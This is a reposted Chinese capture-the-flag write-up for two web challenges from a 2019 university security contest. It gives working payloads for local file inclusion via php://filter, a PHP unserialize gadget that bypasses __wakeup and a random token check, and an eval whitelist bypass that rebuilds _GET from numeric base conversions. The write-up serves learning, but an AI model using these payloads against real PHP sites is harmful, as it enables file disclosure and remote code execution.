2019全国大学生信息安全大赛两道web

其他 2019-05-02 04:08:07 阅读次数: 0

简单小结

菜鸟第一次打国赛,这次题目质量很高,学到了许多姿势。

Web

Justsoso

打开题目,源代码出存在提示:

使用LFI读取index.php与hint.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=index.php

http://d4dc224926cd47bca560b0ec2f84bad155efe5b747574b89.changame.ichunqiu.com/?file=php://filter/read=convert.base64-encode/resource=hint.php

得如下源码:

<html>
<?php
error_reporting(0); 
$file = $_GET["file"]; 
$payload = $_GET["payload"];
if(!isset($file)){
    echo 'Missing parameter'.'<br>';
}
if(preg_match("/flag/",$file)){
    die('hack attacked!!!');
}
@include($file);
if(isset($payload)){  
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'],$query);
    foreach($query as $value){
        if (preg_match("/flag/",$value)) { 
            die('stop hacking!');
            exit();
        }
    }
    $payload = unserialize($payload);
}else{ 
   echo "Missing parameters"; 
} 
?>
<!--Please test index.php?file=xxx.php -->
<!--Please get the source of hint.php-->
</html>

<?php  
class Handle{ 
    private $handle;  
    public function __wakeup(){
        foreach(get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
    public function __construct($handle) { 
        $this->handle = $handle; 
    } 
    public function __destruct(){
        $this->handle->getFlag();
    }
}

class Flag{
    public $file;
    public $token;
    public $token_flag;
 
    function __construct($file){
        $this->file = $file;
        $this->token_flag = $this->token = md5(rand(1,10000));
    }
    
    public function getFlag(){
        $this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
        {
            if(isset($this->file)){
                echo @highlight_file($this->file,true); 
            }  
        }
    }
}
?>

很容易可以知道此题考的是php反序列化,通过file引入hint.phpindex.php,操作payload反序列化执行类中的getflag()函数
此题有两个难点:
正则Flag判断绕过与随机数md5判断的绕过
前者可通过使用 ///绕过parse_url()函数,此时该函数获取到的内容为空,而后者可以使用指针来将token_flag指向token,来使两者恒等。

添加以下代码在本地生成序列化字符串:

$a = new Flag(‘flag.php’);
$a->token_flag = &$a->token;
$b = new Handle($a);
echo urlencode(serialize($b));

输出的结果为:

O%3A6%3A%22Handle%22%3A1%3A%7Bs%3A14%3A%22%00Handle%00handle%22%3BO%3A4%3A%22Flag%22%3A3%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%22bc573864331a9e42e4511de6f678aa83%22%3Bs%3A10%3A%22token_flag%22%3BR%3A4%3B%7D%7D

注意里边有不可见字符%00,且需要将Handle的对象数量改成2+,这样才可以进入__destruct函数。
故最终payload为:

///index.php?file=hint.php&payload=O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"bc573864331a9e42e4511de6f678aa83";s:10:"token_flag";R:4;}}

love_math

打开题目,发现在js地址出使用ajax向calc.php发送数据
使用浏览器访问之,得源码

<?php 
error_reporting(0); 
//听说你很喜欢数学,不知道你是否爱它胜过爱flag 
if(!isset($_GET['c'])){ 
    show_source(__FILE__); 
}else{ 
    //例子 c=20-1 
    $content = $_GET['c']; 
    if (strlen($content) >= 80) { 
        die("太长了不会算"); 
    } 
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]']; 
    foreach ($blacklist as $blackitem) { 
        if (preg_match('/' . $blackitem . '/m', $content)) { 
            die("请不要输入奇奇怪怪的字符"); 
        } 
    } 
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp 
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); 
    foreach ($used_funcs[0] as $func) { 
        if (!in_array($func, $whitelist)) { 
            die("请不要输入奇奇怪怪的函数"); 
        } 
    } 
    //帮你算出答案 
    eval('echo '.$content.';'); 
}

可以看到过滤了一些常用字符和基于白名单的过滤,
限制得比较死,故此处我们只能使用白名单内的函数来进行命令执行,且不能有黑名单内的字符。

我们注意到,白名单里边的base_convert、dechex、decbin等用于进制转换的函数,我们可以使用其来绕过基于白名单的检测。比如:phpinfo可以将phpinfo先转换成hex,在转换成十进制,这样就可以做到无字母执行函数。

由于长度问题,我们无法直接在参数c里传过多的白名单函数+字符,所以这里我们使用其他GET参数传入,不直接使用参数c,即可绕过,但要注意的是此处的参数名,不能为字母,只能为数字,不然会被第二个关键词白名单所拦截。

再由于Ascii转成Hex后转回来需要hex2bin函数,而白名单里并没有这个函数,所以我们需要使用进制转换进行绕过,又因为hex2bin里部分字母只有在32进制后才会出现,所以此处我们选择36进制。将hex2bin36进制成无字母的10进制得到:37907361743我们使用base_convert(37907361743,10,36即可转换成hex2bin,而_GEThex5f474554,里边包含了字母f,需要在进行一次转换:f正好为16进制里的最后一个字母,可直接使用dechex(1598506324)即可绕过。故$sin=base_convert(37907361743,10,36)(dechex(1598506324))即为$sin=_GET
接着我们继续构造:
我们知道:$$sin = $_GET
那么$$sin[a]()即可自定义函数名,但主要此处参数不可为字母,且[]被过滤,故改成`$$sin{0}($$sin{1})``
所以payload构造如下:

?C=$sin=base_convert(37907361743,10,36)(dechex(1598506324));$$sin{0}($$sin{1});&0=show_source&1=flag.php

猜你喜欢

转载自www.cnblogs.com/yunen/p/10801424.html
今日推荐
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
《2024 年一季度互联网投融资运行情况》研究报告
报告:Django 仍然是 74% 开发者的首选
周排行
返回指定时间格式
fopen函数中的mode参数
Java 单例模式探讨
Flex remoteobject工作原理探讨
寻找mplayer的便捷安装方法
30天了解30种技术系列---(26)MySQL自动化运维工具Inception
关于Jboss/Tomcat/Jetty的JNDI定义123
程序减肥,strip,eu-strip 及其符号表
AsyncTask、View.post(Runnable)、ViewTreeObserver三种方式总结frame animation自动启动
Json和Bean的互相转换
每日归档
更多
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022